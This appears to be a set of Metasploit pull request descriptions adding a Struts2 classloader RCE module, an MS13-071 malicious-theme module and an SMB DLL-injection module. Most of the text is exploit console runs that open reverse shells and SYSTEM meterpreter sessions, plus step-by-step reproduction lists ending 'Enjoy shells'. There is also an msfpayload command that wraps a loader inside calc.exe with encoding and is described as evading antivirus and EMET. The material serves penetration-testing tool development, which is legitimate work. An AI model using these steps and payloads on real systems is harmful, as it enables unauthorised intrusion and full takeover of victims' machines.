'hex-all' encoding was previously ignoring slashes.
This pull adds 'hex-noslashes' mode which carries forward the previous functionality, and replaces all existing references to 'hex-all' with 'hex-noslashes' It then adds a replacement 'hex-all' mode, which really encodes *ALL* characters.
Remove checks for specific Tomcat versions, instead checking whether a
stacktrace is returned when requesting
?Class.classLoader.resources.dirContext.cacheObjectMaxSize with invalid
arguments.
Tested against Tomcat 6 and Tomcat 7 with Struts 2.3.16.1
This commit adds an exploit for the Struts2 RCE utilising the Rex
SMBFileServer Protocol support to deploy a JSP shell over SMB.
```
resource (test4.msf)> use exploits/windows/http/struts_http_jspinject
resource (test4.msf)> set VERBOSE true
VERBOSE => true
resource (test4.msf)> set PAYLOAD java/jsp_shell_reverse_tcp
PAYLOAD => java/jsp_shell_reverse_tcp
resource (test4.msf)> set URI /struts2-blank/example/HelloWorld.action
URI => /struts2-blank/example/HelloWorld.action
resource (test4.msf)> set SHARE share
SHARE => share
resource (test4.msf)> set JSP /example/HelloWorld.jsp
JSP => /example/HelloWorld.jsp
resource (test4.msf)> set SRVHOST 172.31.6.41
SRVHOST => 172.31.6.41
resource (test4.msf)> set RHOST 172.31.6.245
RHOST => 172.31.6.245
resource (test4.msf)> set RPORT 8080
RPORT => 8080
resource (test4.msf)> set LHOST 172.31.6.41
LHOST => 172.31.6.41
resource (test4.msf)> set LPORT 4444
LPORT => 4444
resource (test4.msf)> exploit
[*] Started reverse handler on 172.31.6.41:4444
[*] Generating our malicious jsp...
[*] About to start SMB Server on: \\172.31.6.41\share for
/example/HelloWorld.jsp
[*] Starting SMB Server on 172.31.6.41:445
[*] Injecting JSP to 172.31.6.245:8080 -
/struts2-blank/example/HelloWorld.action?Class.classLoader.resources.dirContext.docBase=//172.31.6.41/share
[*] 172.31.6.245:8080 - JSP payload uploaded successfully
[*] Command shell session 1 opened (172.31.6.41:4444 ->
172.31.6.245:1146) at 2014-05-01 12:09:25 +0100
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\Program Files\Apache Software Foundation\apache-tomcat-7.0.53\bin>
```
1. Install Tomcat 7.0.53
2. Download and unpack Struts 2.3.16.1 (http://www.mirrorservice.org/sites/ftp.apache.org//struts/binaries/struts-2.3.16.1-all.zip)
3. Deploy struts-2.3.16.1/apps/struts2-blank.war through Tomcat Manager interface
4. use exploits/windows/http/struts_http_jspinject
5. set PAYLOAD java/jsp_shell_reverse_tcp
6. set URI /struts2-blank/example/HelloWorld.action
7. set SHARE share
8. set JSP /example/HelloWorld.jsp
9. set SRVHOST
10. set RHOST
11. set RPORT 8080
12. set LHOST
13. set LPORT 4444
14. exploit
15. Enjoy shells
- [ ] Land #3074
- [ ] Land #3075
- [ ] Run exploits/windows/http/struts_http_jspinject
Tomcat 7.0.53 & Struts 2.3.16.1
This commit refactors the ms13_071_theme module written by @jvazques-r7
to utilise the Rex SMBFileServer protocol and remove duplicate code from
Metasploit.
```
[*] Processing test3.msf for ERB directives.
resource (test3.msf)> use exploits/windows/fileformat/ms13_071_theme
resource (test3.msf)> set VERBOSE true
VERBOSE => true
resource (test3.msf)> set SHARE share
SHARE => share
resource (test3.msf)> set SCR exploit.scr
SCR => exploit.scr
resource (test3.msf)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (test3.msf)> set LHOST 172.32.255.1
LHOST => 172.32.255.1
resource (test3.msf)> set SRVHOST 172.32.255.1
SRVHOST => 172.32.255.1
resource (test3.msf)> set LPORT 4444
LPORT => 4444
resource (test3.msf)> exploit
[*] Started reverse handler on 172.32.255.1:4444
[*] Generating our malicious executable...
[*] Creating 'msf.theme' file ...
[+] msf.theme stored at /root/.msf4/local/msf.theme
[+] Let your victim open msf.theme
[*] Starting SMB Server on: \\172.32.255.1\share\exploit.scr
[*] Starting SMB Server on 172.32.255.1:445
[*] Sending stage (769536 bytes) to 172.32.255.129
[*] Meterpreter session 1 opened (172.32.255.1:4444 -> 172.32.255.129:1096) at 2014-04-30 12:05:46 +0100
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```
1. use exploits/windows/fileformat/ms13_071_theme
2. set payload windows/meterpreter/reverse_tcp
3. set LHOST
4. set SRVHOST
5. exploit
6. Copy msf.theme to target
7. Open theme and navigate to "Screensaver" tab
8. Enjoy shells
- [ ] Land #3074
- [ ] Land #3075
- [ ] Run exploits/windows/fileformat/ms13_071_theme
- [ ] Let target open malicious msf.theme file
* Windows XP SP3
This is an implementation of using the SMBFileServer mixin to perform
DLL injection over SMB.
Exploitation can be performed by starting the dllinjector exploit
which will remain resident until a DLL is downloaded and a session
created. By generating an executable using the windows/loadlibrary
payload it is possible to test the SMBServer mixin on various platforms,
but also serves as a novel injection method where LoadLibrary calls are
not being filtered by Antivirus or EMET.
Example Run
```
# msfcli exploits/windows/smb/dllinjector PAYLOAD=windows/meterpreter/reverse_tcp SHARE=share DLL=exploit.dll LHOST=172.32.255.1 LPORT=4444 SRVHOST=172.32.255.1 E
[*] Initializing modules...
PAYLOAD => windows/meterpreter/reverse_tcp
SHARE => share
DLL => exploit.dll
LHOST => 172.32.255.1
LPORT => 4444
SRVHOST => 172.32.255.1
[*] Started reverse handler on 172.32.255.1:4444
[*] Generating our malicious dll...
[*] Starting SMB Server on: \\172.32.255.1\share\exploit.dll
[*] Sending stage (769536 bytes) to 172.32.255.128
[*] Meterpreter session 1 opened (172.32.255.1:4444 -> 172.32.255.128:1186) at 2014-04-24 11:18:55 +0100
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```
Reproduction Steps
* Generate dllinjector executable (non-malicious)
```
msfpayload windows/loadlibrary DLL="\\\\1.2.3.4\\share\\exploit.dll" R | msfencode -b '\x00' -t exe -x calc.exe -k -o dllinjector.exe -e x86/shikata_ga_nai -c 3
```
* Run DLL Injection server
```
msfcli exploits/windows/smb/dllinjector PAYLOAD=windows/meterpreter/reverse_tcp LHOST=1.2.3.4 LPORT=4444 SRVHOST=1.2.3.4 SHARE=share DLL=exploit.dll E
```
* Execute dllinjector.exe on the target host
* Monitor the generated traffic in Wireshark
* Enjoy shells.
Verification
Land #3074
Land #3075
Generate loadlibrary executable
Load dllinjector with payload
Run executable on target
Tested on:
Windows 7 (x86/x64)
Windows Server 2003
Windows Server 2008
Florian Gaultier